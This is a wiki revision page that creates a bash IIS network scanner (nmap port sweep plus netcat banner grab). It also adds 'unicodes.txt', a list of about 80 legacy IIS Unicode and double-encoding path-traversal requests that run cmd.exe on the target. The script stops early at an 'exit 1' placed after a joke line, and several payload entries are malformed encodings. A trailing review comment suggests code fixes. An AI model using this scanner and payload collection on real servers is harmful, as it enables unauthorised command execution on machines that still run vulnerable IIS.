bash:examples:iisscan [2013/01/07 01:14] Daniel Gohlke created |
bash:examples:iisscan [2024/02/16 01:04] (current) |
||
---|---|---|---|
Line 1: | Line 1: | ||
+ | ====== IISscan.sh====== | ||
+ | Simple IIS network scanner\\ | ||
+ | Requirements: | ||
+ | grep, nmap, netcat\\ | ||
+ | <file bash iisscan.sh> | ||
+ | #!/bin/bash | ||
+ | # A Simple IIS network scanner | ||
+ | # ./iisscan.sh 10.*.54.3-23 output | ||
+ | # http://code-reference.com | ||
+ | # thanks to Ge0rG | ||
+ | clear | ||
+ | if [ $# -ne 2 ] | ||
+ | then | ||
+ | echo "$0 [ip room] [outputfile]" >&2 | ||
+ | exit 0 | ||
+ | else | ||
+ | echo "Written by cd ;) " | ||
+ | echo "scan started against to $1 on port 80" | ||
+ | echo "ScR1Ptk1dDi3 Pr0t3c7 Sy5t3m v 1.o";exit 1 | ||
+ | |||
+ | nmap $1 -p 80 -sS -oG ~/$1.out | grep open | cut '-d ' -f 2 | ||
+ | cat ~/$1.out | grep open | cut '-d ' -f 2 > $2 | ||
+ | fi | ||
+ | rm ~/$1.out | ||
+ | sum=0 | ||
+ | g=`cat $2 | wc -c` | ||
+ | sum=`expr $sum + $g` | ||
+ | if [ $sum = 0 ] | ||
+ | then | ||
+ | echo "no matches !!!" | ||
+ | rm $2 | ||
+ | exit 1 | ||
+ | fi | ||
+ | |||
+ | echo "Please wait testing server versions" | ||
+ | while read host ; | ||
+ | do | ||
+ | netcat -w 5 $host 80 < test.cmd | grep "^Server: " | sed "s/^Server:/$host/" | grep "IIS" >>hosts.$1.tmp | ||
+ | done < $2 | ||
+ | sum=0 | ||
+ | g=`cat hosts.$1.tmp | wc -c` | ||
+ | sum=`expr $sum + $g` | ||
+ | if [ $sum = 0 ] | ||
+ | then | ||
+ | echo "no matches !!! of IIS Server" | ||
+ | rm hosts.$1.tmp | ||
+ | exit 1 | ||
+ | fi | ||
+ | rm $2 | ||
+ | cat hosts.$1.tmp | cut '-d ' -f 1 > $2 | ||
+ | rm hosts.$1.tmp | ||
+ | echo "Thanks for use ... " | ||
+ | </file> | ||
+ | |||
+ | <file cmd test.cmd> | ||
+ | HEAD / HTTP/1.0 | ||
+ | </file> | ||
+ | |||
+ | <file txt unicodes.txt> | ||
+ | GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ | ||
+ | GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /MSADC/root.exe?/c+dir | ||
+ | GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /c/winnt/system32/cmd.exe?/c+dir | ||
+ | GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /d/winnt/system32/cmd.exe?/c+dir | ||
+ | GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /msadc/..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../winnt/system32/cmd.exe\ HTTP/1.1?/c\ HTTP/1.1+dir | ||
+ | GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c0%af../winnt/system32/cmd.exe.sh?/c+dir | ||
+ | GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | GET /scripts/root.exe?/c+dir | ||
+ | GET /msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir | ||
+ | |||
+ | </file> |
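Review bot: The script body uses `$1` and `$2` unquoted as file names (`~/$1.out`, `hosts.$1.tmp`, `rm $2`), so a target spec containing `*`, `/` or spaces is subject to globbing and word splitting; the usage comment itself shows `10.*.54.3-23`, and a slash (CIDR notation) would make `~/$1.out` point into a directory that does not exist. I would take the scratch files out of the argument namespace with `scan_out=$(mktemp) || exit 1` and quote every expansion, as in `rm -- "$2"`. `hosts.$1.tmp` is also opened with `>>`, so a leftover file from an earlier run is mixed into the new results. The usage branch prints to stderr but then runs `exit 0`, which should be non-zero. Separately, `unicodes.txt` is not referenced by the script and has no description: one sentence saying it is a list of legacy IIS encoded path-traversal request patterns, usable as match strings when reviewing web-server logs or IDS rules, would tell readers what it is, and several entries such as `%c1%pc` and `%c0%9v` are not valid percent-encodings.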